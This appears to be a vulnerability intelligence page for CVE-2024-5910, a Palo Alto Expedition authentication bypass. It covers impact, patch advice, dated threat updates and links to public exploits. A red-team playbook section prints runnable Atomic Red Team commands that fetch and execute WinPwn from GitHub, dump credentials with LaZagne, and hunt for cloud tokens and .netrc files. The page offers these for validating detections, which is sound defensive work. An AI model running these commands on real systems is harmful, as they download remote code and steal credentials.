CVE-2024-5910
Overview
This vulnerability is an authentication bypass affecting Palo Alto Networks Expedition, a configuration migration and tuning tool. The root cause is the absence of authentication enforcement on a critical administrative function within the Expedition application. This flaw resides in the component responsible for handling admin-level operations accessible over the network interface.
Vulnerability Description
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition. Note: Expedition is a tool aiding in configuration migration, tuning, and enrichment. Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue.
Impact
An attacker with network access to the Expedition server can exploit this vulnerability to assume control of an administrator account without credentials or user interaction. This enables unauthorized access to sensitive configuration data, including secrets and credentials imported into Expedition, potentially leading to full compromise of the migration environment and exposure of confidential network configurations. The lack of authentication requirements significantly lowers the attack complexity, increasing the risk of lateral movement within the affected environment.
Solution
Palo Alto Networks has released an official security advisory detailing the vulnerability and corresponding patches, available at their security portal. Users must apply the updated Expedition software version that enforces proper authentication on administrative functions as specified in the advisory. Refer to https://security.paloaltonetworks.com/CVE-2024-5910 for detailed patch instructions and recommended mitigation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Palo Alto Networks Expedition stems from a critical oversight in the authentication mechanisms governing access to essential functions within the tool. Expedition, designed to facilitate configuration migration, tuning, and enrichment, lacks adequate authentication controls for certain administrative functions. This oversight allows an attacker with network access to exploit the system, potentially gaining unauthorized access to an Expedition admin account. The absence of robust authentication creates a significant security gap, enabling malicious actors to manipulate configurations, extract sensitive data, and compromise the integrity of the entire system.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker with basic network access could leverage this flaw to bypass authentication protocols, gaining control over the Expedition tool without needing valid credentials. This could be executed through various means, such as network sniffing, man-in-the-middle attacks, or even direct access to the server hosting Expedition. Once inside, the attacker could perform a range of malicious activities, including altering configurations, exfiltrating sensitive information like configuration secrets and credentials, or even launching further attacks on connected systems. The potential for lateral movement within an organization’s network increases significantly, as Expedition often interfaces with other critical security infrastructure.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Expedition for their security operations. The risk extends beyond the immediate compromise of the Expedition tool itself; it encompasses the potential exposure of sensitive configuration data and credentials that could lead to broader system vulnerabilities. An attacker could leverage the information obtained to execute further attacks, such as gaining access to firewalls, VPNs, and other security appliances that depend on the configurations managed by Expedition. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if sensitive data is exposed or misused. Organizations may face significant operational disruptions, as the integrity of their security posture is compromised.
To effectively detect and mitigate this vulnerability, organizations must adopt a multi-layered security approach. Regular audits of user access controls and authentication mechanisms are essential to identify and rectify any weaknesses. Implementing network segmentation can also limit the potential attack surface by restricting access to the Expedition tool only to authorized personnel. Additionally, organizations should enforce strict monitoring and logging of administrative activities within Expedition to detect any unauthorized access attempts in real-time. Employing intrusion detection systems (IDS) can further enhance visibility into network traffic, helping to identify suspicious activities that may indicate exploitation attempts.
In conclusion, the vulnerability within Palo Alto Networks Expedition represents a critical security concern that necessitates immediate attention from organizations utilizing this tool. The combination of inadequate authentication controls and the potential for extensive data exposure underscores the importance of proactive security measures. By implementing robust detection and mitigation strategies, organizations can safeguard their configurations and sensitive data, thereby reinforcing their overall cybersecurity posture against potential threats. The stakes are high, and addressing this vulnerability is essential for maintaining the integrity and security of an organization’s network infrastructure.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-5910, with telemetry indicating a notable increase in exploit attempts targeting Palo Alto Networks Expedition. This uptick is accompanied by a slight rise in the Exploit Prediction Scoring System (EPSS) score, reflecting growing confidence in the exploitability of this vulnerability. Concurrently, new proof-of-concept exploits have surfaced, including enhanced Metasploit modules that automate admin account takeover and remote code execution without requiring prior credentials. These developments amplify the threat landscape by lowering the technical barriers for adversaries to compromise Expedition instances, thereby increasing the risk of unauthorized access to sensitive configuration data. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanding exploit toolkit and rising detection trends suggest heightened adversary interest and potential for broader impact. Consequently, the threat level associated with CVE-2024-5910 has escalated from critical to an even more urgent posture, underscoring the imperative for defenders to maintain vigilant monitoring and rapid response capabilities.
Update 2 — July 13, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-5910, evidenced by a significant uptick in telemetry from network sensors. This surge coincides with the emergence of additional publicly available proof-of-concept exploits, including refined Metasploit modules that automate both the admin account takeover and subsequent remote code execution. The increased sophistication and accessibility of these tools lower the barrier for adversaries to compromise vulnerable Palo Alto Networks Expedition instances. Although ransomware deployment linked to this vulnerability remains unconfirmed, the expanding exploit ecosystem and rising detection trends amplify the risk of unauthorized access to sensitive configuration data. Consequently, the threat level associated with CVE-2024-5910 has intensified, warranting heightened vigilance from defenders to detect and respond to exploitation attempts promptly.
Update 3 — August 04, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2024-5910, reflecting a slight upward trend in adversary activity. This change coincides with the continued availability and refinement of multiple proof-of-concept exploits, including Metasploit modules that facilitate both admin account takeover and remote code execution without requiring prior authentication. Although the overall exploit momentum remains stable, the ease of leveraging these publicly accessible tools lowers the technical barrier for threat actors, potentially broadening the attacker base. The absence of confirmed ransomware campaigns exploiting this vulnerability does not diminish the critical risk posed to sensitive configuration data managed by Palo Alto Networks Expedition. Consequently, the threat level remains elevated, with defenders needing to maintain heightened situational awareness as exploitation attempts become incrementally more frequent and accessible.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Expedition | All |
cpe:2.3:a:paloaltonetworks:expedition:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464)
exploits/linux/http/paloalto_expedition_rce
|
Michael Heinzl, Zach Hanley, Enrique Castillo +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover | ByteHunter | webapps | multiple | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
p33d/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464
|
p33d | 0 | 0 | 2024-11-15 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-5910 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/CVE-2024-5910 |
| horizon3.ai |
NVD API
Exploit
Third Party Advisory
|
https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-5910 |